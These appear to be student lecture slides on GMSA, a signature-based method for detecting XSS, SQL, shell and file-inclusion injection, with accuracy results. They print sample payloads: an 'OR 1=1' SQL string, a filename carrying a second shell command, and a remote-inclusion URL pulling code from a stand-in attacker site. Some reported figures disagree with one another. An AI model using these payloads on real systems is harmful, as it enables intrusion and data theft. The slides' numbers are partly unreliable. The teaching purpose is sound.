GMSA: Gathering Multiple Signatures Approach

to Defend Against Code Injection Attacks

Coordinator Name:
Muneeba Zuha K Vidya sree
Internal Guide: 16321A05B5
Swapna G IV CSE B
 Code Injection Attacks

• Code Injection is the general term for attack types which consist of injecting code
that is then executed by the application.
• This type of attack exploits poor handling of untrusted data. These types of attacks
are usually made possible due to a lack of proper input/output data validation
• An authorized user can obtain access to the system’s database by inserting his or her
username and password into the system; then the system checks if the username and
password are correct or not.
• An attacker gets access to the information on the database of the webpage by using
methods of attack such as CIA
 Types of Code Injection

• XSS Attacks
• SQL Injection Attacks
• Shell Injection Attacks(Command Injection Attacks)
• File Inclusion Attacks
 XSS Attacks
• Cross Site Scripting attack means sending and injecting malicious code or script. Malicious
code is usually written with client-side programming languages such as JavaScript, HTML,
VBScript, Flash, etc. However, JavaScript and HTML are mostly used to perform this attack.

• The main reason for this attack is inappropriate user’s input validation, where malicious
input can get into the output. A malicious user can enter a script, which will be injected into
the website’s code. Then the browser is not able to know if the executed code is malicious or
not.
Examples:
 SQL Injection Attacks

• SQL injections are a code injection technique, used to attack data-

driven applications, in which malicious SQL statements are inserted
for execution.
• A way of exploiting user input and SQL Statements to compromise
the database and/or retrieve sensitive data.
Examples:
• Arbitrary string pattern:
Select Password1 From Users Where Password1 =
’’/∗∗∗∗∗∗∗/OR/∗∗∗∗∗∗∗∗∗∗∗∗∗∗∗/1=1/∗∗∗∗∗∗∗ /;
• Group contatenate string:
In this type of SQL injection, an attacker does not need to insert ‘‘Or’’,
‘‘Like’’ characters.
For example: Select Group_Concat (UserName, Password1) From MemberA.
Select Concat (UserName, Password1) From MemberB.
• Stored procedure:
The signatures of these attacks are: Update, Delete user, Drop table, Insert into tables,
Show tables etc.
 Shell Injection Attacks(Command Injection Attacks)
• A Shell Injection Attack or Command Injection Attack is an attack in which an attacker
takes advantage of vulnerabilities of a web application and executes arbitrary command in
the server for malicious activities.
• Suppose, a web application takes name of a file as input from a user and displays its
contents. And, the web application has implemented that with the following piece of code:

<?php
print(please specify the name of the file);
$file=$_GET[‘filename’]
system(“cat $file”);
?>
If the user gives an input ‘profile.txt’, corresponding file will be displayed.
but, suppose an attacker can give input ‘profile.txt ; ls;’. It will list all the files in the
directory.
 File Inclusion Attacks

• A file inclusion vulnerability allows an attacker to access unauthorized or sensitive files

available on the web server or to execute malicious files on the web server by making use
of the ‘include’ functionality.
• This vulnerability is mainly due to a bad input validation mechanism, wherein the user’s
input is passed to the file include commands without proper validation.
• The impact of this vulnerability can lead to malicious code execution on the server or
reveal data present in sensitive files, etc.
• abc.html:
<html>
<body>
<div class =”menu”><?php include ‘menu.php’;?></div>
<p>WELCOME</p>
</body>
</html>
Remote file inclusion:

RFI allows an attacker to include and execute a remotely hosted file using a script by including it in the attack
page. The attacker can use RFI to run a malicious code either on the client side or on the server.

One of the vulnerable locations can be as follows, where the value of the “testfile” parameter is supplied by
the user:
www.victim_site.com/abc.php?testfile=example
The vulnerable PHP code is as follows:

$test = $_REQUEST[“testfile”];
Include($test.”.php”);

Following is one of the possible attack vectors for the above-mentioned vulnerable PHP code:
www.victim_site.com/abc.php?test=http://www.attacker_site.com/attack_page
The file “attack_page” is now included into the vulnerable include page available on the server and it gets
executed whenever the “abc.php” page is accessed or executed. The attacker can carve malicious code in this
“attack_page” and can perform malicious activities.
Local file inclusion:

The local file inclusion vulnerability is a process of including the local files available on the server. This
vulnerability occurs when a user input contains the path to the file that has to be included. When such an input is
not properly sanitized, the attacker may give some default file names and access unauthorized files, or an attacker
may also make use of directory traversal characters and retrieve sensitive files available in other directories.

Consider an example as follows where we can apply this attack.

http://victim_site/abc.php?file=userinput.txt
The value of “file” parameter is taken into the following PHP code, and the file is included:
<?php
…
include $_REQUEST[‘file’];
…
?>
 GMSA

• The technique of the GMSA framework is to detect signatures that an attacker could
use when attempting a code injection attack.
• Most research has focused on the two major types of CIA, namely SQL injection and
XSS attacks
• GMSA which considers all possible CIAs and their mitigating strategies. Our empirical
analysis demonstrates that GMSA is significant in detecting CIA with a low false
positive rate of around 0.59%.
 PROPOSED GMSA MODEL
In this section we present the GMSA model for detecting and classifying CIAs.
There are five phases:
Phase 1-URL Collection
Phase 2- Proposed Method
Phase 3- Dataset Testing
Phase 4- Proposed Classifier
Phase 5- Classifier Result.
Phase 1: URL COLLECTION
Initially, the dataset for the URL Collection, consisting of both benign and malicious URLs
was collected from two different resources. Dataset A was downloaded from HTTP
DATASET CSIC 2010 which consists of large amounts of code injection attack datasets,
while Dataset B was downloaded from SecLists which is a security tester’s companion.

Phase 2: GSMA FRAMEWORK

• In this phase we mix the benign and malicious links together, and prepare them to create
two training datasets for Dataset A and another two training datasets for Dataset B.
• The GMSA framework can distinguish between benign and malicious codes in the
datasets depending on the attack signature patterns.
• To be more accurate in the URL checking, if the GMSA finds one attack signature of the
CIA, it should find another attack signature in the URL’s link. Thus the two attack
signatures should be together in the link with a consideration of the URL’s link of the
webpage containing the malicious code.
Phase 3: DATASET TESTING
• Separating data into training and testing sets is an important part of evaluating data in
Data Testing phase.
• The dataset is divided into training and testing sets in order to check the
accuracy and precision of the GMSA model.

Phase 4: CLASSIFIER
• In the Proposed Classifier, our proposed framework receives the link’s code from the
dataset, and checks whether it is benign or malicious.
• We check, classify, and validate the training and testing datasets with the GMSA
framework to generate and construct the Classifier Result.
Phase 5: CLASSIFIER RESULT
The last phase is known as the Classifier Result. In this phase the GMSA framework informs
us whether each link’s code in the datasets is benign or malicious.
We collect the results of the Proposed Classifier and determine the output result which
consists of
Precision Rate (PR),
Recall Rate (RR),
False Positive (FP),
False Negative (FN),
True Positive (TP),
True Negative (TN)
Accuracy (ACC)
 ROC DIAGRAM OF DATASET A

TP: Attack detected where it was an attack

TN: not attack no alarm no detection
TNR = TN / (TN + FP)
FPR = FP / (FP + TN)
Precision = 1667 / (1667 + 17) = 98.99%
Precision = Positive Predictive Value = TP / (TP +FP) = P
TPR = 1667 / (1667 + 5) = 99.70%
Recall = True Positive Rate = Sensitivity = TP / (TP +FN) = R
TNR = 469/ (469 + 17) = 469/486 = 96.50%
Accuracy = (TP + TN) / (TP + TN + FP + FN)
FPR =17/ (17 + 469) = 17/486 = 03.49%
Accuracy = (1667+469)/(1667+469+17+5) = 0.9898
 ROC DIAGRAM OF DATASET B

Precision = 1357/(1357 + 6) = 99.55%

TPR = 1357/(1357 + 7) = 99.48%
TNR = 671/(671 + 4) = 671/674 = 99.40%
FPR = 4/(4 + 671) = 4/675 = 0.59%
Accuracy = (983 + 671)/(983 + 671 + 4 + 5) = 0.9945.
Results of different algorithms for detecting CIA
 Conclusion
• GMSA methodology provides more precise performance and results compared to other
research on this topic.
• GMSA detects various types of CIA, such as XSS attack, SQL injection attack, Shell
injection attack (Command injection attack), and Remote File Inclusion attack. Other
researchers mostly consider SQL injection and XSS attacks.
• The accuracy of GMSA is 99.45% which is significant compared with what other
research papers have suggested.
• The Precision Rate of GMSA is 99.55%, TPR (Recall Rate) is 99.48%, the TNR is
99.40%, and the FPR is 0.59%. The false positive rate is low compared with other
research.
• The low false positive rate is a very important factor, because the defense algorithm
should balance between the FPR and TPR. It can therefore be concluded that GMSA
outperforms research to date in the field
Queries??